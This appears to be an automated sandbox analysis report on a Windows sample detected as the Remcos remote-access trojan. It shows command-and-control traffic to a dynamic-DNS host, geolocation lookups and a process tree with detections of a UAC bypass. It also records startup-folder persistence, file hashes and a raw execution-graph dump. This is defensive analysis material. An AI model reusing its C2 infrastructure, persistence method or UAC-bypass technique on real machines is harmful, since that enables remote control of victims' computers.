              May 2, 2024 15:10:17.438484907 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:17.483313084 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:17.593044043 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:17.623439074 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:17.787003040 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:17.787070036 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:17.958954096 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:18.054697037 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:18.100419044 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:18.211184025 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:18.269450903 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:18.460237980 CEST4971780192.168.2.6178.237.33.50
              May 2, 2024 15:10:18.624003887 CEST8049717178.237.33.50192.168.2.6
              May 2, 2024 15:10:18.624151945 CEST4971780192.168.2.6178.237.33.50
              May 2, 2024 15:10:18.624363899 CEST4971780192.168.2.6178.237.33.50
              May 2, 2024 15:10:18.792819023 CEST8049717178.237.33.50192.168.2.6
              May 2, 2024 15:10:18.792921066 CEST4971780192.168.2.6178.237.33.50
              May 2, 2024 15:10:18.809041023 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:18.974522114 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:19.792700052 CEST8049717178.237.33.50192.168.2.6
              May 2, 2024 15:10:19.792953968 CEST4971780192.168.2.6178.237.33.50
              May 2, 2024 15:10:35.529891968 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:35.533654928 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:35.693332911 CEST27664971623.94.53.100192.168.2.6
              Timestamp	Source Port	Dest Port	Source IP	Dest IP
              May 2, 2024 15:09:56.903291941 CEST	64592	53	192.168.2.6	1.1.1.1
              May 2, 2024 15:09:56.994733095 CEST	53	64592	1.1.1.1	192.168.2.6
              May 2, 2024 15:09:58.545958042 CEST	49960	53	192.168.2.6	1.1.1.1
              May 2, 2024 15:09:58.636861086 CEST	53	49960	1.1.1.1	192.168.2.6
              Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
              May 2, 2024 15:09:56.903291941 CEST	192.168.2.6	1.1.1.1	0xff1b	Standard query (0)	yuahdgbceja.sytes.net	A (IP address)	IN (0x0001)	false
              May 2, 2024 15:09:58.545958042 CEST	192.168.2.6	1.1.1.1	0x3415	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
              Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
              May 2, 2024 15:09:56.994733095 CEST	1.1.1.1	192.168.2.6	0xff1b	No error (0)	yuahdgbceja.sytes.net		23.94.53.100	A (IP address)	IN (0x0001)	false
              May 2, 2024 15:09:58.636861086 CEST	1.1.1.1	192.168.2.6	0x3415	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false
              • geoplugin.net
              Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
              0	192.168.2.6	49709	178.237.33.50	80	2248	C:\Windows\SysWOW64\svchost.exe
              Timestamp	Bytes transferred	Direction	Data
              May 2, 2024 15:09:58.805686951 CEST	71	OUT	GET /json.gp HTTP/1.1
              Host: geoplugin.net
              Cache-Control: no-cache
              May 2, 2024 15:09:58.976731062 CEST	1173	IN	HTTP/1.1 200 OK
              date: Thu, 02 May 2024 13:09:58 GMT
              server: Apache
              content-length: 965
              content-type: application/json; charset=utf-8
              cache-control: public, max-age=300
              access-control-allow-origin: *
              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 33 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
              Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"3ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


              Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
              1	192.168.2.6	49717	178.237.33.50	80	592	C:\Windows\SysWOW64\svchost.exe
              Timestamp	Bytes transferred	Direction	Data
              May 2, 2024 15:10:18.624363899 CEST	71	OUT	GET /json.gp HTTP/1.1
              Host: geoplugin.net
              Cache-Control: no-cache
              May 2, 2024 15:10:18.792819023 CEST	1173	IN	HTTP/1.1 200 OK
              date: Thu, 02 May 2024 13:10:18 GMT
              server: Apache
              content-length: 965
              content-type: application/json; charset=utf-8
              cache-control: public, max-age=300
              access-control-allow-origin: *
              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
              Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


              Target ID:0
              Start time:15:06:49
              Start date:02/05/2024
              Path:C:\Users\user\Desktop\GVV.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\GVV.exe"
              Imagebase:0x110000
              File size:1'369'600 bytes
              MD5 hash:FA3641C75D2BEB68C01E8065EEFC4707
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:4
              Start time:15:09:54
              Start date:02/05/2024
              Path:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\GVV.exe"
              Imagebase:0x470000
              File size:116'712'960 bytes
              MD5 hash:67B3857DEE4F4219F088B87902BFF4B0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              Reputation:low
              Has exited:true

              Target ID:5
              Start time:15:09:55
              Start date:02/05/2024
              Path:C:\Windows\SysWOW64\svchost.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\GVV.exe"
              Imagebase:0x180000
              File size:46'504 bytes
              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
              Reputation:moderate
              Has exited:true

              Target ID:9
              Start time:15:09:57
              Start date:02/05/2024
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456
              Imagebase:0xa80000
              File size:483'680 bytes
              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:12
              Start time:15:10:05
              Start date:02/05/2024
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456
              Imagebase:0xa80000
              File size:483'680 bytes
              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:13
              Start time:15:10:07
              Start date:02/05/2024
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
              Imagebase:0x7ff622df0000
              File size:170'496 bytes
              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:14
              Start time:15:10:13
              Start date:02/05/2024
              Path:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
              Imagebase:0x470000
              File size:116'712'960 bytes
              MD5 hash:67B3857DEE4F4219F088B87902BFF4B0
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:15
              Start time:15:10:14
              Start date:02/05/2024
              Path:C:\Windows\SysWOW64\svchost.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
              Imagebase:0x180000
              File size:46'504 bytes
              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
              Reputation:moderate
              Has exited:false


                Execution Graph

                Execution Coverage:2.9%
                Dynamic/Decrypted Code Coverage:0.4%
                Signature Coverage:2.9%
                Total number of Nodes:2000
                Total number of Limit Nodes:42
97606->97608 97609 14868e 97607->97609 97613 14867a 97607->97613 97746 13f2c6 20 API calls __dosmaperr 97608->97746 97748 13f2c6 20 API calls __dosmaperr 97609->97748 97612 148643 97621->97581 97622->97584 97624 1459ca ___scrt_is_nonwritable_in_current_image 97623->97624 97625 1459d2 97624->97625 97626 1459ea 97624->97626 97702 13f2c6 20 API calls __dosmaperr 97625->97702 97628 145a88 97626->97628 97632 145a1f 97626->97632 97707 13f2c6 20 API calls __dosmaperr 97628->97707 97629 1459d7 97648 145147 EnterCriticalSection 97632->97648 97636 145a25 97648->97636 97702->97629 97746->97612 97800 113156 97803 113170 97800->97803 97804 113187 97803->97804 97805 1131eb 97804->97805 97806 11318c 97804->97806 97843 1131e9 97804->97843 97808 1131f1 97805->97808 97809 152dfb 97805->97809 97810 113265 PostQuitMessage 97806->97810 97811 113199 97806->97811 97807 1131d0 DefWindowProcW 97844 11316a 97807->97844 97812 1131f8 97808->97812 97813 11321d SetTimer RegisterWindowMessageW 97808->97813 97852 1118e2 10 API calls 97809->97852 97810->97844 97815 1131a4 97811->97815 97816 152e7c 97811->97816 97817 113201 KillTimer 97812->97817 97818 152d9c 97812->97818 97820 113246 CreatePopupMenu 97813->97820 97813->97844 97821 152e68 97815->97821 97822 1131ae 97815->97822 97858 17bf30 34 API calls ___scrt_fastfail 97816->97858 97848 1130f2 Shell_NotifyIconW ___scrt_fastfail 97817->97848 97824 152dd7 MoveWindow 97818->97824 97825 152da1 97818->97825 97819 152e1c 97853 12e499 42 API calls 97819->97853 97820->97844 97857 17c161 27 API calls ___scrt_fastfail 97821->97857 97829 152e4d 97822->97829 97830 1131b9 97822->97830 97824->97844 97832 152da7 97825->97832 97833 152dc6 SetFocus 97825->97833 97829->97807 97856 170ad7 22 API calls 97829->97856 97836 1131c4 97830->97836 97837 113253 97830->97837 97831 152e8e 97831->97807 97831->97844 97832->97836 97838 152db0 97832->97838 97833->97844 97834 113214 97849 113c50 DeleteObject DestroyWindow 97834->97849 97835 113263 97835->97844 97836->97807 97854 
1130f2 Shell_NotifyIconW ___scrt_fastfail 97836->97854 97850 11326f 44 API calls ___scrt_fastfail 97837->97850 97851 1118e2 10 API calls 97838->97851 97843->97807 97846 152e41 97855 113837 49 API calls ___scrt_fastfail 97846->97855 97848->97834 97849->97844 97850->97835 97851->97844 97852->97819 97853->97836 97854->97846 97855->97843 97856->97843 97857->97835 97858->97831 97859 1a82440 97873 1a80000 97859->97873 97861 1a824df 97876 1a82330 97861->97876 97879 1a83520 GetPEB 97873->97879 97875 1a8068b 97875->97861 97877 1a82339 Sleep 97876->97877 97878 1a82347 97877->97878 97880 1a8354a 97879->97880 97880->97875 97881 1303fb 97882 130407 ___scrt_is_nonwritable_in_current_image 97881->97882 97910 12feb1 97882->97910 97884 13040e 97885 130561 97884->97885 97888 130438 97884->97888 97937 13083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97885->97937 97887 130568 97938 134e52 28 API calls _abort 97887->97938 97898 130477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97888->97898 97921 14247d 97888->97921 97890 13056e 97939 134e04 28 API calls _abort 97890->97939 97894 130576 97895 130457 97897 1304d8 97929 130959 97897->97929 97898->97897 97933 134e1a 38 API calls 3 library calls 97898->97933 97900 1304de 97902 1304f3 97900->97902 97934 130992 GetModuleHandleW 97902->97934 97904 1304fa 97904->97887 97905 1304fe 97904->97905 97906 130507 97905->97906 97935 134df5 28 API calls _abort 97905->97935 97936 130040 13 API calls 2 library calls 97906->97936 97909 13050f 97909->97895 97911 12feba 97910->97911 97940 130698 IsProcessorFeaturePresent 97911->97940 97913 12fec6 97941 132c94 10 API calls 3 library calls 97913->97941 97915 12fecb 97920 12fecf 97915->97920 97942 142317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97915->97942 97917 12fee6 97917->97884 97918 12fed8 97918->97917 97943 132cbd 8 API calls 3 library 
calls 97918->97943 97920->97884 97923 142494 97921->97923 97922 130a8c _ValidateLocalCookies 5 API calls 97924 130451 97922->97924 97923->97922 97924->97895 97925 142421 97924->97925 97926 142450 97925->97926 97927 130a8c _ValidateLocalCookies 5 API calls 97926->97927 97928 142479 97927->97928 97928->97898 97944 132340 97929->97944 97931 13096c GetStartupInfoW 97932 13097f 97931->97932 97932->97900 97933->97897 97934->97904 97935->97906 97936->97909 97937->97887 97938->97890 97939->97894 97940->97913 97941->97915 97942->97918 97943->97920 97944->97931 97945 111098 97950 1142de 97945->97950 97949 1110a7 97951 11a961 22 API calls 97950->97951 97952 1142f5 GetVersionExW 97951->97952 97953 116b57 22 API calls 97952->97953 97954 114342 97953->97954 97955 1193b2 22 API calls 97954->97955 97957 114378 97954->97957 97956 11436c 97955->97956 97959 1137a0 22 API calls 97956->97959 97958 11441b GetCurrentProcess IsWow64Process 97957->97958 97965 1537df 97957->97965 97960 114437 97958->97960 97959->97957 97961 153824 GetSystemInfo 97960->97961 97962 11444f LoadLibraryA 97960->97962 97963 114460 GetProcAddress 97962->97963 97964 11449c GetSystemInfo 97962->97964 97963->97964 97966 114470 GetNativeSystemInfo 97963->97966 97967 114476 97964->97967 97966->97967 97968 11109d 97967->97968 97969 11447a FreeLibrary 97967->97969 97970 1300a3 29 API calls __onexit 97968->97970 97969->97968 97970->97949 97971 11105b 97976 11344d 97971->97976 97973 11106a 98007 1300a3 29 API calls __onexit 97973->98007 97975 111074 97977 11345d __wsopen_s 97976->97977 97978 11a961 22 API calls 97977->97978 97979 113513 97978->97979 97980 113a5a 24 API calls 97979->97980 97981 11351c 97980->97981 98008 113357 97981->98008 97986 11515f 22 API calls 97987 113544 97986->97987 97988 11a961 22 API calls 97987->97988 97989 11354d 97988->97989 97990 11a6c3 22 API calls 97989->97990 97991 113556 RegOpenKeyExW 97990->97991 97992 153176 RegQueryValueExW 97991->97992 97996 113578 97991->97996 97993 153193 
97992->97993 97994 15320c RegCloseKey 97992->97994 97995 12fe0b 22 API calls 97993->97995 97994->97996 98006 15321e _wcslen 97994->98006 97997 1531ac 97995->97997 97996->97973 97999 115722 22 API calls 97997->97999 97998 114c6d 22 API calls 97998->98006 98000 1531b7 RegQueryValueExW 97999->98000 98001 1531d4 98000->98001 98003 1531ee ISource 98000->98003 98002 116b57 22 API calls 98001->98002 98002->98003 98003->97994 98004 119cb3 22 API calls 98004->98006 98005 11515f 22 API calls 98005->98006 98006->97996 98006->97998 98006->98004 98006->98005 98007->97975 98009 151f50 __wsopen_s 98008->98009 98010 113364 GetFullPathNameW 98009->98010 98011 113386 98010->98011 98012 116b57 22 API calls 98011->98012 98013 1133a4 98012->98013 98014 1133c6 98013->98014 98015 1133dd 98014->98015 98016 1530bb 98014->98016 98023 1133ee 98015->98023 98018 12fddb 22 API calls 98016->98018 98020 1530c5 _wcslen 98018->98020 98019 1133e8 98019->97986 98021 12fe0b 22 API calls 98020->98021 98022 1530fe __fread_nolock 98021->98022 98024 1133fe _wcslen 98023->98024 98025 113411 98024->98025 98026 15311d 98024->98026 98033 11a587 98025->98033 98028 12fddb 22 API calls 98026->98028 98030 153127 98028->98030 98029 11341e __fread_nolock 98029->98019 98031 12fe0b 22 API calls 98030->98031 98032 153157 __fread_nolock 98031->98032 98034 11a59d 98033->98034 98037 11a598 __fread_nolock 98033->98037 98035 12fe0b 22 API calls 98034->98035 98036 15f80f 98034->98036 98035->98037 98036->98036 98037->98029 98038 1490fa 98039 149107 98038->98039 98043 14911f 98038->98043 98088 13f2d9 20 API calls __dosmaperr 98039->98088 98041 14910c 98089 1427ec 26 API calls __cftof 98041->98089 98044 14917a 98043->98044 98052 149117 98043->98052 98090 14fdc4 21 API calls 2 library calls 98043->98090 98046 13d955 __fread_nolock 26 API calls 98044->98046 98047 149192 98046->98047 98058 148c32 98047->98058 98049 149199 98050 13d955 __fread_nolock 26 API calls 98049->98050 98049->98052 98051 1491c5 98050->98051 98051->98052 
98053 13d955 __fread_nolock 26 API calls 98051->98053 98054 1491d3 98053->98054 98054->98052 98055 13d955 __fread_nolock 26 API calls 98054->98055 98056 1491e3 98055->98056 98057 13d955 __fread_nolock 26 API calls 98056->98057 98057->98052 98059 148c3e ___scrt_is_nonwritable_in_current_image 98058->98059 98060 148c46 98059->98060 98065 148c5e 98059->98065 98092 13f2c6 20 API calls __dosmaperr 98060->98092 98062 148d24 98099 13f2c6 20 API calls __dosmaperr 98062->98099 98064 148c4b 98093 13f2d9 20 API calls __dosmaperr 98064->98093 98065->98062 98066 148c97 98065->98066 98069 148ca6 98066->98069 98070 148cbb 98066->98070 98067 148d29 98100 13f2d9 20 API calls __dosmaperr 98067->98100 98094 13f2c6 20 API calls __dosmaperr 98069->98094 98091 145147 EnterCriticalSection 98070->98091 98074 148cb3 98101 1427ec 26 API calls __cftof 98074->98101 98075 148cab 98095 13f2d9 20 API calls __dosmaperr 98075->98095 98076 148cc1 98078 148cf2 98076->98078 98079 148cdd 98076->98079 98083 148d45 __fread_nolock 38 API calls 98078->98083 98096 13f2d9 20 API calls __dosmaperr 98079->98096 98081 148c53 __fread_nolock 98081->98049 98084 148ced 98083->98084 98098 148d1c LeaveCriticalSection __wsopen_s 98084->98098 98085 148ce2 98097 13f2c6 20 API calls __dosmaperr 98085->98097 98088->98041 98089->98052 98090->98044 98091->98076 98092->98064 98093->98081 98094->98075 98095->98074 98096->98085 98097->98084 98098->98081 98099->98067 98100->98074 98101->98081 98102 11f7bf 98103 11f7d3 98102->98103 98104 11fcb6 98102->98104 98106 11fcc2 98103->98106 98107 12fddb 22 API calls 98103->98107 98199 11aceb 23 API calls ISource 98104->98199 98200 11aceb 23 API calls ISource 98106->98200 98109 11f7e5 98107->98109 98109->98106 98110 11f83e 98109->98110 98111 11fd3d 98109->98111 98129 11ed9d ISource 98110->98129 98137 121310 98110->98137 98201 181155 22 API calls 98111->98201 98114 11fef7 98122 11a8c7 22 API calls 98114->98122 98114->98129 98116 12fddb 22 API calls 98134 11ec76 ISource 98116->98134 98118 
11a8c7 22 API calls 98118->98134 98119 164600 98124 11a8c7 22 API calls 98119->98124 98119->98129 98120 164b0b 98203 18359c 82 API calls __wsopen_s 98120->98203 98122->98129 98124->98129 98126 130242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98126->98134 98127 11fbe3 98127->98129 98130 164bdc 98127->98130 98136 11f3ae ISource 98127->98136 98128 11a961 22 API calls 98128->98134 98204 18359c 82 API calls __wsopen_s 98130->98204 98132 1300a3 29 API calls pre_c_initialization 98132->98134 98133 164beb 98205 18359c 82 API calls __wsopen_s 98133->98205 98134->98114 98134->98116 98134->98118 98134->98119 98134->98120 98134->98126 98134->98127 98134->98128 98134->98129 98134->98132 98134->98133 98135 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98134->98135 98134->98136 98197 1201e0 256 API calls 2 library calls 98134->98197 98198 1206a0 41 API calls ISource 98134->98198 98135->98134 98136->98129 98202 18359c 82 API calls __wsopen_s 98136->98202 98138 1217b0 98137->98138 98139 121376 98137->98139 98489 130242 5 API calls __Init_thread_wait 98138->98489 98140 121390 98139->98140 98141 166331 98139->98141 98206 121940 98140->98206 98494 19709c 256 API calls 98141->98494 98145 1217ba 98148 1217fb 98145->98148 98150 119cb3 22 API calls 98145->98150 98147 16633d 98147->98134 98152 166346 98148->98152 98154 12182c 98148->98154 98149 121940 9 API calls 98151 1213b6 98149->98151 98157 1217d4 98150->98157 98151->98148 98153 1213ec 98151->98153 98495 18359c 82 API calls __wsopen_s 98152->98495 98153->98152 98160 121408 __fread_nolock 98153->98160 98491 11aceb 23 API calls ISource 98154->98491 98490 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98157->98490 98158 121839 98492 12d217 256 API calls 98158->98492 98160->98158 98162 16636e 98160->98162 98169 12fddb 22 API calls 98160->98169 98171 12fe0b 22 API calls 98160->98171 98177 12152f 98160->98177 
